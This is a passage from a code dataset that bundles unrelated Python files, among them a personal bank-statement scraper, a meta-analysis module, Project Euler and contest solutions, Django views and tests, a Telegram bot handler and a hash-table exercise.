main()\n","sub_path":"tests/v2_validation/upgrade/upgrade_rancher_server.py","file_name":"upgrade_rancher_server.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"594573786","text":"import time\nfrom splinter import Browser\n\nimport constants\nimport fileUtils\n\n\ndef get_bill_number():\n profile = fileUtils.getBroswerProfile()\n with Browser(profile_preferences=profile) as browser:\n browser.visit('https://service.mbna.ca/waw/mbna/logon')\n browser.find_by_id('usernameInput').fill(constants.MBNA_ACCOUNT)\n browser.find_by_id('passwordInput').fill(constants.MBNA_PASSWORD)\n browser.find_by_id('login').click()\n if False:\n question = browser.find_by_id('MFAChallengeForm:question').value\n browser.find_by_id('MFAChallengeForm:answer').fill(constants.get_answer(question))\n browser.find_by_id('MFAChallengeForm:validateButton').click()\n time.sleep(5)\n browser.find_by_id('shortcuts0').find_by_tag('input').last.click()\n browser.find_by_tag('span').find_by_text('Statements').click()\n\n infos = browser.find_by_xpath('''//div[@class='td-layout-column td-layout-grid2 td-copy-align-right td-margin-none td-layout-column-last']''')\n\n value = infos[0].value\n datelinkvalue = infos[1].value\n # datelinkvalue = datelinkvalue.replace(' ', '')\n datelinkvalue = datelinkvalue.split('/')\n datelinkvalue = [datelinkvalue[2], datelinkvalue[0], datelinkvalue[1]]\n datelinkvalue = fileUtils.seperate_with(datelinkvalue)\n browser.find_by_text('Save current statement (pdf) ').click()\n time.sleep(5)\n fileUtils.renameFile('MBNA_'+datelinkvalue+'.pdf')\n return value\n\nif __name__ == '__main__':\n print('MBNA bill: ', get_bill_number())\n\n\n\n\n","sub_path":"grapMBNAbill.py","file_name":"grapMBNAbill.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"187612137","text":"from __future__ import absolute_import\r\nfrom __future__ import print_function\r\nimport numpy as np\r\nimport scipy.stats as st\r\nimport fastlmm.util.mingrid as mingrid\r\nfrom six.moves import range\r\n\r\n\r\nclass MetaAnalysis(object):\r\n \r\n def __init__(self, beta, ste, tau=0):\r\n self.beta = beta\r\n self.ste = ste\r\n self.tau = tau\r\n \r\n def var_beta(self):\r\n var = self.ste * self.ste + self.tau\r\n return var\r\n\r\n def inverse_variance_weights(self):\r\n return 1.0 / self.var_beta()\r\n\r\n def z_score(self):\r\n z_score = self.mean_beta() / self.ste_mean()\r\n return z_score\r\n\r\n def meta_pvalue(self):\r\n z_score = self.z_score() \r\n chi2 = z_score * z_score\r\n return st.chi2.sf(chi2, 1)\r\n\r\n def mean_beta(self):\r\n weights = self.inverse_variance_weights()\r\n mean_beta = self.beta.dot(weights) / (weights).sum()\r\n return mean_beta\r\n \r\n def ste_mean(self):\r\n return 1.0 / np.sqrt(self.inverse_variance_weights().sum())\r\n\r\n def log_likelihood(self, tau=None, mean_beta=None, reml=False):\r\n \r\n if tau is None:\r\n var = self.var_beta()\r\n else:\r\n var = self.ste * self.ste + tau\r\n\r\n determinant = np.log(var).sum()\r\n if mean_beta is None:\r\n # ML (equiv. 
REML) estimate of beta:\r\n mean_beta = (self.beta / var).sum() / (1.0 / var).sum()\r\n if reml:\r\n # perform REML\r\n determinant += np.log((1.0 / var).sum()) - np.log(self.beta.shape)\r\n residuals = (self.beta - mean_beta)\r\n rss = (residuals * residuals / var).sum()\r\n \r\n log_likelihood = - 0.5 * (determinant + rss)\r\n return log_likelihood\r\n\r\n\r\nclass FixefEffects(MetaAnalysis):\r\n\r\n def __init__(self, beta, ste):\r\n MetaAnalysis.__init__(self, beta=beta, ste=ste, tau=0)\r\n\r\n\r\nclass RandomEffects(MetaAnalysis):\r\n \"\"\"\r\n We use REML to \r\n\r\n\r\n Quantifying heterogeneity in a meta-analysis\r\n Julian P. T. Higgins and Simon G. Thompson\r\n MRC Biostatistics Unit; Institute of Public Health; Robinson Way; Cambridge CB2 2SR; U.K.\r\n \"\"\"\r\n def __init__(self, beta, ste, reml=True):\r\n self.reml=reml\r\n tau = self.estimate_tau(beta=beta, ste=ste)\r\n MetaAnalysis.__init__(self, beta=beta, ste=ste, tau=tau)\r\n\r\n def tau_ml(self, beta, ste):\r\n meta = MetaAnalysis(beta=beta, ste=ste, tau=0)\r\n def f(x):\r\n return -meta.log_likelihood(tau=x, mean_beta=0)\r\n\r\n tau = mingrid.minimize1D(f, evalgrid=None, nGrid=10, minval=0.0, maxval=(beta*beta).mean(), verbose=False, brent=True,check_boundaries=True, resultgrid=None, return_grid=False)\r\n return tau[0]\r\n\r\n def estimate_tau(self, beta, ste):\r\n meta = MetaAnalysis(beta=beta, ste=ste, tau=0)\r\n def f(x):\r\n return -meta.log_likelihood(tau=x, mean_beta=None, reml=self.reml)\r\n\r\n tau = mingrid.minimize1D(f, evalgrid=None, nGrid=10, minval=0.0, maxval=(beta*beta).mean(), verbose=False, brent=True,check_boundaries=True, resultgrid=None, return_grid=False)\r\n return tau[0]\r\n\r\n\r\nclass HierarchicalRandomEffects(object):\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n import pylab as plt\r\n plt.ion()\r\n\r\n N_repeats = 1000\r\n tau = 0.0\r\n beta_true = 0.0\r\n N_tests = 1000\r\n\r\n z_scores = np.zeros(N_repeats)\r\n p_values = np.zeros(N_repeats)\r\n z_scores_re = np.zeros(N_repeats)\r\n p_values_re = np.zeros(N_repeats)\r\n for i in range(N_repeats):\r\n \r\n var = np.random.uniform(size=N_tests)\r\n ste = np.sqrt(var)\r\n beta = np.random.normal(size=N_tests) * np.sqrt(var+tau) + beta_true\r\n \r\n fe = FixefEffects(beta=beta, ste=ste)\r\n p_values[i] = fe.meta_pvalue()\r\n mean_fe = fe.mean_beta()\r\n ste_fe = fe.ste_mean()\r\n var_beta = fe.var_beta()\r\n z_scores[i] = fe.z_score()\r\n\r\n print(\"Fixed effects: mean=%.6f, ste=%.6f, pv=%.6f, z_score=%.6f\" % (mean_fe, ste_fe, p_values[i], z_scores[i]))\r\n\r\n re = RandomEffects(beta=beta, ste=ste)\r\n p_values_re[i] = re.meta_pvalue()\r\n mean_fe = re.mean_beta()\r\n ste_fe = re.ste_mean()\r\n var_beta = re.var_beta()\r\n z_scores_re[i] = re.z_score()\r\n print(\"random effects: mean=%.6f, ste=%.6f, pv=%.6f, z_score=%.6f\" % (mean_fe, ste_fe, p_values_re[i], z_scores_re[i]))\r\n\r\n plt.figure(); plt.hist(z_scores, bins=50)\r\n plt.figure(); plt.hist(p_values)\r\n\r\n plt.figure(); plt.hist(z_scores_re, bins=50)\r\n plt.figure(); plt.hist(p_values_re)\r\n\r\n plt.figure(); plt.plot(z_scores_re*z_scores_re, z_scores*z_scores, '.')\r\n\r\n\r\n\r\n","sub_path":"fastlmm/association/meta_analysis.py","file_name":"meta_analysis.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422646613","text":"\"\"\"\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat 
is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\"\"\"\n\nif __name__ == \"__main__\":\n\n i = 20\n while any(bool(i % n) for n in (11, 12, 13, 14, 15, 16, 17, 18, 19, 20)):\n i += 20\n\n print(i)\n","sub_path":"001-009/005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"603560332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re \n\ndef parse_a_label(a_href, root_url):\n try:\n href_value = a_href['href']\n except:\n return\n\n fig_str = r'#$'\n fig_pattern = re.compile(fig_str)\n if(fig_pattern.match(href_value)):\n try:\n str1 = a_href['onclick']\n except:\n print('a label have not a vaule of ATTR onclick')\n return\n \n m = re.findall(\"'([^']+)'\", str1)\n href_value = m[0]\n\n if (re.match(r'http', href_value)):\n return href_value\n\n if (re.match(r'/', href_value)):\n list_href = root_url.split('/')[0:3];\n href_ulr = ''\n for a_href in list_href:\n if (a_href == ''):\n href_ulr = href_ulr + '//'\n else:\n href_ulr = href_ulr + a_href\n\n href_ulr = href_ulr + href_value\n return href_ulr\n \n if (re.match(r'\\.', href_value)):\n href_ulr = root_url + href_value[1:]\n else:\n href_ulr = root_url + href_value\n\n return href_ulr\n \n \n \n \n \n \n","sub_path":"downLoadFrame/parseHtmlElement.py","file_name":"parseHtmlElement.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"66833235","text":"import sys\nsys.stdin = open('cook.txt', 'r')\n\nimport collections\nimport itertools\n\n\ndef CnullG_calculator(lst1, lst2):\n global N, minimi\n sumA = 0\n sumB = 0\n for _ in lst1:\n for __ in lst1:\n if _ == __:\n continue\n else:\n sumA += base[_][__]\n for _ in lst2:\n for __ in lst2:\n if _ == __:\n continue\n else:\n sumB += base[_][__]\n cha = abs(sumA - sumB)\n if cha < minimi:\n minimi = cha\n return\n\n\ndef CnullG_finder():\n # glob\n global N, minimi\n if len(cosA) == N//2 and len(cosB) == N//2:\n CnullG_calculator(cosA, cosB)\n else:\n if len(cosA) != N//2:\n for i in range(N):\n if vztd[i] == 0:\n vztd[i] = 1\n cosA.append(i)\n CnullG_finder()\n cosA.pop()\n vztd[i] = 0\n else:\n continue\n else:\n for i in range(N):\n if vztd[i] == 0:\n vztd[i] = 1\n cosB.append(i)\n CnullG_finder()\n cosB.pop()\n vztd[i] = 0\n else:\n continue\n\n\ntestnum = int(input())\nfor testcase in range(1, testnum+1):\n N = int(input())\n base = [0]*N\n cosA = []\n cosB = []\n vztd = [0]*N\n minimi = 10000000\n for _ in range(N):\n base[_] = list(map(int, input().split()))\n # for i in range(N):\n # vztd[i] = 1\n # cosA.append(i)\n # CnullG_finder()\n # cosA.pop()\n # vztd[i] = 0\n lst = [_ for _ in range(N)]\n\n a = list(itertools.combinations(lst, N//2))\n for i in range(len(a)):\n idx = 0\n inb = 0\n b = [0] * (N // 2)\n aa = [0] * (N // 2)\n for _ in range(N):\n if idx < N//2:\n if a[i][idx] == _:\n aa[idx] = _\n idx += 1\n else:\n b[inb] = _\n inb += 1\n else:\n b[inb] = _\n inb += 1\n CnullG_calculator(aa, b)\n print('#%d %d' %(testcase, minimi))","sub_path":"algorithm_practice/for_ad/chef.py","file_name":"chef.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"358723330","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.conf import settings\nfrom django.http import 
HttpResponseRedirect\nfrom django.core.mail import send_mail\nfrom .forms import EmailForm\nfrom .models import Host\n\ndef get_email(request):\n # If this is a POST request we need to process the form data\n if request.method == 'POST':\n # Create a form instance and populate it with data from the request:\n form = EmailForm(request.POST)\n # Check whether it's valid:\n if form.is_valid():\n # Process the data in form.cleaned_data as required\n message_data = form.cleaned_data['message']\n subject_data = form.cleaned_data['subject']\n\n # Get data from database\n try:\n host_data = Host.objects.get(pk='1')\n print(host_data)\n except:\n pass\n\n # Email\n # https://docs.djangoproject.com/en/1.8/topics/email/\n send_mail(subject_data, message_data, 'from@example.com', ['isarchitture@gmail.com'], fail_silently=False)\n # Redirect to a new URL:\n return HttpResponseRedirect('/name/')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = EmailForm()\n\n return render(request, 'jumbotron-form.html', {'form': form})\n","sub_path":"iforms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"654275633","text":"# Truncatable primes\n# Project Euler - Problem 37\n# Sean Malloy\nLIMIT = 1000000\nprimes = [True for _ in range(LIMIT)]\nprimes[0] = primes[1] = False\n\nfor i in range(2, len(primes)):\n if primes[i]:\n step = i\n index = i + step\n while index < len(primes):\n primes[index] = False\n index += step\n\ndef truncate_lr(p):\n return '' if len(str(p)) == 1 else str(p)[1:]\n\ndef truncate_rl(p):\n return '' if len(str(p)) == 1 else str(p)[0:-1]\n\ndef is_truncate(p):\n lr = truncate_lr(p)\n rl = truncate_rl(p)\n while lr != '':\n if not primes[int(lr)] or not primes[int(rl)]:\n return False\n lr = truncate_lr(lr)\n rl = truncate_rl(rl)\n return True\n\ns = 0\nfor p in range(11, len(primes)):\n if primes[p] and is_truncate(p):\n s += p\nprint(s)\n","sub_path":"python/p037.py","file_name":"p037.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374673409","text":"from toontown.coghq.SpecImports import *\nGlobalEntities = {1000: {'type': 'levelMgr',\n 'name': 'LevelMgr',\n 'comment': '',\n 'parentEntId': 0,\n 'cogLevel': 0,\n 'farPlaneDistance': 1500,\n 'modelFilename': 'phase_10/models/cashbotHQ/ZONE03a',\n 'wantDoors': 1},\n 1001: {'type': 'editMgr',\n 'name': 'EditMgr',\n 'parentEntId': 0,\n 'insertEntity': None,\n 'removeEntity': None,\n 'requestNewEntity': None,\n 'requestSave': None},\n 0: {'type': 'zone',\n 'name': 'UberZone',\n 'comment': '',\n 'parentEntId': 0,\n 'scale': 1,\n 'description': '',\n 'visibility': []},\n 10000: {'type': 'entrancePoint',\n 'name': '',\n 'comment': '',\n 'parentEntId': 0,\n 'pos': Point3(0.0, 6.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': 1,\n 'entranceId': 0,\n 'radius': 15,\n 'theta': 20},\n 10001: {'type': 'mintProduct',\n 'name': '',\n 'comment': '',\n 'parentEntId': 10004,\n 'pos': Point3(-11.4890069962, 20.1173057556, 0.0),\n 'hpr': Point3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10003: {'type': 'mintProduct',\n 'name': 'copy of ',\n 'comment': '',\n 'parentEntId': 10004,\n 'pos': Point3(-20.4286708832, 12.2706327438, 0.0),\n 'hpr': Vec3(90.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10007: {'type': 'mintProduct',\n 'name': 'copy of ',\n 'comment': 
'',\n 'parentEntId': 10004,\n 'pos': Point3(-19.2144012451, 20.1173057556, 0.0),\n 'hpr': Point3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10006: {'type': 'model',\n 'name': 'crateStack',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(10.5386743546, 18.1184597015, 0.0),\n 'hpr': Vec3(270.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'collisionsOnly': 0,\n 'flattenType': 'light',\n 'loadType': 'loadModelCopy',\n 'modelPath': 'phase_10/models/cashbotHQ/crates_G1.bam'},\n 10008: {'type': 'model',\n 'name': '',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(13.8522205353, -20.3127307892, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'collisionsOnly': 0,\n 'flattenType': 'light',\n 'loadType': 'loadModelCopy',\n 'modelPath': 'phase_10/models/cashbotHQ/crates_C1.bam'},\n 10002: {'type': 'nodepath',\n 'name': 'props',\n 'comment': '',\n 'parentEntId': 0,\n 'pos': Point3(0.0, 0.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': 1},\n 10004: {'type': 'nodepath',\n 'name': 'product',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(0.0, 0.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0)}}\nScenario0 = {}\nlevelSpec = {'globalEntities': GlobalEntities,\n 'scenarios': [Scenario0]}\n","sub_path":"toontown/coghq/CashbotMintEntrance_Action00.py","file_name":"CashbotMintEntrance_Action00.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"55829618","text":"# coding: utf-8\n\nfrom django.test import TestCase, Client\nfrom django.core.urlresolvers import reverse\n\nfrom core.models import Profile\n\n\nclass AboutViewTest(TestCase):\n def setUp(self):\n self.resp = self.client.get('/about/')\n\n def test_get(self):\n 'GET /about/ must return status code 200'\n self.assertEqual(200, self.resp.status_code)\n\n def test_template(self):\n 'About page must use about.html'\n self.assertTemplateUsed(self.resp, 'about.html')\n\n\nclass ProfileUpdateTest(TestCase):\n fixtures = ['user.json']\n\n def setUp(self):\n self.client = Client()\n self.client.login(username='user', password='user')\n\n self.profile = Profile.objects.get(user__username='user')\n self.profile_data = {\n 'username': self.profile.user.username,\n 'name': self.profile.user.get_full_name(),\n 'email': self.profile.user.email,\n 'about_me': '',\n 'github': '',\n 'facebook': '',\n 'site': '',\n }\n\n def test_update_profile_username(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['username'] = 'new_username'\n\n response = self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('new_username', new_profile.user.username)\n\n def test_update_profile_name(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['name'] = 'User Full Name'\n\n response = self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('User Full Name', new_profile.user.get_full_name())\n\n def test_update_profile_site(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['site'] = 'http://speakerfight.com/profile/'\n\n response = 
self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('http://speakerfight.com/profile/', new_profile.site)\n","sub_path":"core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162614263","text":"import torch\nimport torch.nn as nn\n\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom .inpaint_dataset import InpaintDataset\n\nclass SimpleInpaintDataset(InpaintDataset):\n r\"\"\" A simple implementation of inpaint dataset \n which only supports pre-defined masks\n \n \"\"\"\n \n def __init__(self, img_flist_path, mask_flist_path,\n resize_shape=(256, 256), transforms_oprs=['to_tensor']):\n\n with open(img_flist_path, 'r') as f:\n self.img_paths = f.read().splitlines()\n \n with open(mask_flist_path, 'r') as f:\n self.mask_paths = f.read().splitlines()\n \n # assure that the mask and the image path list are of same length\n assert(len(self.mask_paths) == len(self.img_paths))\n \n self.resize_shape = resize_shape\n self.transform_initialize(resize_shape, transforms_oprs)\n \n def __len__(self):\n return len(self.img_paths)\n \n def __getitem__(self, index):\n # create the paths for images and masks\n img_path = self.img_paths[index]\n img = self.transforms_fun(self.read_img(img_path))\n mask_path = self.mask_paths[index]\n mask = self.read_mask(mask_path)\n mask = self.transforms_fun(mask)\n\n return img * 255, mask\n \n def read_mask(self, path):\n \"\"\"\n Read mask\n \"\"\"\n mask = Image.open(path).convert(\"1\")\n return mask","sub_path":"data/simple_inpaint_dataset.py","file_name":"simple_inpaint_dataset.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"588201893","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndf = pd.read_excel('datasets/imiona.xlsx')\nprint(df)\n\ngrupa = df.groupby(['Plec']).agg({'Liczba':['sum']})\nprint(grupa)\nwykres = grupa.plot.bar()\nwykres.set_ylabel('Liczba')\nwykres.set_xlabel('Plec')\nwykres.legend()\nplt.title('liczba urodzonych chłopców i dziewczynek')\nplt.show()","sub_path":"wd_cw09/Zad_2.py","file_name":"Zad_2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"213912369","text":"from lib import *\nfrom main import *\nfrom telegram.ext import *\nfrom telegram import *\n\nID1_MALUMOT, ID1_BUYURTMA, ID1_MUTAXASSIS, ID1_SAXIFALAR = (\n '📃 Маълумот олиш', '📥 Буюртма бериш', '🗯 Мутаҳассис билан боғланиш', '📲 Ижтимоий тармоқлар'\n)\nbuttons_id1 = ReplyKeyboardMarkup([\n [ID1_MALUMOT, ID1_BUYURTMA], [ID1_MUTAXASSIS, ID1_SAXIFALAR], [BACK]\n], resize_keyboard=True)\n\n\ndef info(update, context):\n update.message.reply_html(id1_info)\n\n\ndef social(update, context):\n update.message.reply_html(id1_social, disable_web_page_preview=True)\n\n\ndef contact(update, context):\n update.message.reply_html(id1_contact, reply_markup=button_back)\n return STATE_ID1_CONTACT\n\n\ndef id1_feedback(update, message):\n telegram_id = update.message.chat_id\n msg = update.message.text\n phone = cursor.execute(\"\"\"SELECT phone_number FROM Users WHERE telegram_id = '{}'\n \"\"\".format(telegram_id)).fetchone()\n name = 
cursor.execute(\"\"\"SELECT name FROM Users WHERE telegram_id = '{}'\n \"\"\".format(telegram_id)).fetchone()\n f = open('id1/id1_fdbck.txt', 'a')\n f.write(f\"\"\"Пользователь:\n {time.asctime()}\n Имя: {name[0]};\n Телефон: {phone[0]};\n Telegram_ID: {telegram_id};\n \n Сообщение: {msg}\n \\n\\n\"\"\")\n f.close()\n update.message.reply_html(accepted_id1.format(name_of_user(update)))\n\n\ndef order(update, context):\n update.message.reply_html(\"order selected\")\n\n\n","sub_path":"id1/client_id1.py","file_name":"client_id1.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"137287807","text":"#!/usr/bin/env python3\nimport sys\nimport itertools\n\nYES = \"Yes\" # type: str\nNO = \"No\" # type: str\n\n\ndef solve(N: int, M: int, A: \"List[int]\", B: \"List[int]\", C: \"List[int]\", D: \"List[int]\"):\n ab_matrix = [[False] * N for x in range(N)]\n cd_matrix = [[False] * N for x in range(N)]\n\n for a, b in zip(A, B):\n ab_matrix[a-1][b-1] = True\n ab_matrix[b-1][a-1] = True\n for c, d in zip(C, D):\n cd_matrix[c-1][d-1] = True\n cd_matrix[d-1][c-1] = True\n\n # print(ab_matrix)\n # print(cd_matrix)\n\n for perm in itertools.permutations(range(N), N):\n # print(perm)\n ans = True\n for i in range(N):\n for j in range(N):\n # print(f\"i,j,perm[i],perm[j]:{i+1},{j+1},{perm[i]+1},{perm[j]+1}={ab_matrix[i][j] == cd_matrix[perm[i]][perm[j]]}\")\n if ab_matrix[i][j] != cd_matrix[perm[i]][perm[j]]:\n ans = False\n if ans:\n print(YES)\n return\n print(NO)\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n A = [int()] * (M) # type: \"List[int]\"\n B = [int()] * (M) # type: \"List[int]\"\n for i in range(M):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n C = [int()] * (M) # type: \"List[int]\"\n D = [int()] * (M) # type: \"List[int]\"\n for i in range(M):\n C[i] = int(next(tokens))\n D[i] = int(next(tokens))\n solve(N, M, A, B, C, D)\n\nif __name__ == '__main__':\n main()\n","sub_path":"atcoder/python/beginner/abc232/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617612514","text":"from data_gatherer import *\r\nimport datetime\r\nimport os\r\n\r\nUP_AND_DOWN = \"UAD\"\r\nSIDE_TO_SIDE = \"STS\"\r\n\r\nclass BasicStats:\r\n def __init__(self, subjFolderName, sessionFolderName):\r\n self.folderPath = subjFolderName + \"/\" + sessionFolderName\r\n self.subjFolderName = subjFolderName\r\n self.sessionFolderName = sessionFolderName\r\n self.stats = {}\r\n self.stats['dateTime'] = self.dateTime\r\n self.stats['date'] = self.dateTime.strftime(\"%m-%d\")\r\n self.stats['AMPM'] = self.AMPM\r\n self.stats['timeOfDay'] = self.timeOfDay\r\n \r\n headAttitudeRatePoints = MotionFileParser.getHeadAttitudeRatePoints(self.folderPath)\r\n self.stats['isFaultySession'] = self.isFaultySession(headAttitudeRatePoints)\r\n self.stats['duration'] = self.getDuration(headAttitudeRatePoints)\r\n self.stats['direction'] = self.getDirection(headAttitudeRatePoints)\r\n [self.stats['dizzinessPre'], self.stats['dizzinessPost']] = 
self.getDizzinessRatings(self.folderPath)\r\n \r\n def isFaultySession(self, headAttitudePoints):\r\n return self.getDuration(headAttitudePoints) < 25\r\n \r\n def getDizzinessRatings(self, folderPath):\r\n filePath = folderPath + \"/metadata.txt\"\r\n if os.path.exists(filePath):\r\n f = open(filePath, 'r')\r\n lines = f.readlines()\r\n dizzinessPre = int(lines[0].split(\": \")[1])\r\n dizzinessPost = int(lines[1].split(\": \")[1])\r\n return [dizzinessPre, dizzinessPost]\r\n else:\r\n return ['NA', 'NA']\r\n \r\n @property\r\n def dateTime(self):\r\n parts = self.sessionFolderName.split(\"__\")\r\n dateStr = parts[0].replace(\"Session_\",\"\")\r\n timeStr = parts[1].replace(\"_EDT\",\"\")\r\n dateParts = dateStr.split(\"-\")\r\n timeParts = timeStr.split(\"_\")\r\n \r\n mon = int(dateParts[0])\r\n day = int(dateParts[1])\r\n year = int(dateParts[2])\r\n hour = int(timeParts[0])\r\n minute = int(timeParts[1])\r\n \r\n return datetime.datetime(year, mon, day, hour, minute) \r\n \r\n \r\n def getDuration(self, headAttitudeRatePoints): \r\n startTime = float(headAttitudeRatePoints[0].timeStamp)\r\n endTime = float(headAttitudeRatePoints[-1].timeStamp)\r\n return round(endTime - startTime) \r\n \r\n @property \r\n def AMPM(self):\r\n hour = self.dateTime.hour\r\n if hour >= 12:\r\n return \"PM\"\r\n else:\r\n return \"AM\"\r\n \r\n @property \r\n def timeOfDay(self):\r\n hour = self.dateTime.hour\r\n timeOfDay = \"\"\r\n if hour >= 4 and hour < 12:\r\n timeOfDay = \"morning\"\r\n elif hour >= 12 and hour < 18:\r\n timeOfDay = \"afternoon\"\r\n elif hour >= 18 and hour < 20:\r\n timeOfDay = \"evening\"\r\n else:\r\n timeOfDay = \"night\"\r\n return timeOfDay\r\n \r\n \r\n def getDirection(self, headAttitudeRates):\r\n sumPitch = 0\r\n sumYaw = 0\r\n for pt in headAttitudeRates:\r\n sumPitch += abs(pt.pitch)\r\n sumYaw += abs(pt.yaw)\r\n \r\n if sumYaw > sumPitch * 1.5:\r\n return SIDE_TO_SIDE\r\n else:\r\n return UP_AND_DOWN","sub_path":"ExerciseData/basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"210439793","text":"# python3\r\n\r\nclass Query:\r\n\r\n def __init__(self, query):\r\n self.type = query[0]\r\n if self.type == 'check':\r\n self.ind = int(query[1])\r\n else:\r\n self.s = query[1]\r\n\r\n\r\nclass QueryProcessor:\r\n _multiplier = 263\r\n _prime = 1000000007\r\n\r\n def __init__(self, bucket_count):\r\n self.bucket_count = bucket_count\r\n # store all strings in one list\r\n self.elems = [[]]*bucket_count\r\n\r\n def _hash_func(self, s):\r\n ans = 0\r\n for c in reversed(s):\r\n ans = (ans * self._multiplier + ord(c)) % self._prime\r\n return ans % self.bucket_count\r\n\r\n def write_search_result(self, was_found):\r\n print('yes' if was_found else 'no')\r\n\r\n def write_chain(self, chain):\r\n print(' '.join(chain))\r\n\r\n def read_query(self):\r\n return Query(input().split())\r\n\r\n def process_query(self, query):\r\n if query.type == \"check\":\r\n # use reverse order, because we append strings to the end\r\n if self.elems[query.ind]:\r\n print(' '.join(c for c in reversed(self.elems[query.ind])))\r\n else:\r\n print()\r\n \r\n else:\r\n h = self._hash_func(query.s)\r\n \r\n if query.type == \"add\":\r\n if not self.elems[h]: #if empty list\r\n self.elems[h] = [query.s]\r\n elif query.s not in self.elems[h]:\r\n self.elems[h].append(query.s)\r\n \r\n elif query.type == \"del\":\r\n if query.s in self.elems[h]:\r\n 
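# delete by value: look up the string's position in this bucket's chain and pop it (self.elems[h].remove(query.s) would be equivalent)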
self.elems[h].pop(self.elems[h].index(query.s))\r\n \r\n else: # query_type == \"find\"\r\n was_found = 1 if query.s in self.elems[h] else 0\r\n self.write_search_result(was_found)\r\n \r\n\r\n def process_queries(self):\r\n# n = 12\r\n# query_list = ['add world', 'add HellO', 'check 4', 'find World', \\\r\n# 'find world', 'del world', 'check 4', 'del HellO', \\\r\n# 'add luck', 'add GooD', 'check 2', 'del good']\r\n\r\n n = int(input()) # 2nd line number of queries\r\n for i in range(n):\r\n self.process_query(self.read_query())\r\n\r\nif __name__ == '__main__':\r\n\r\n '''\r\n Implements chaining scheme : list of hash_numbers\r\n elems[hash_number] = ['string1', 'string2', ...]\r\n \r\n Good job! (Max time used: 2.32/7.00, max memory used: 26480640/536870912.)\r\n '''\r\n bucket_count = int(input()) #5\r\n proc = QueryProcessor(bucket_count)\r\n 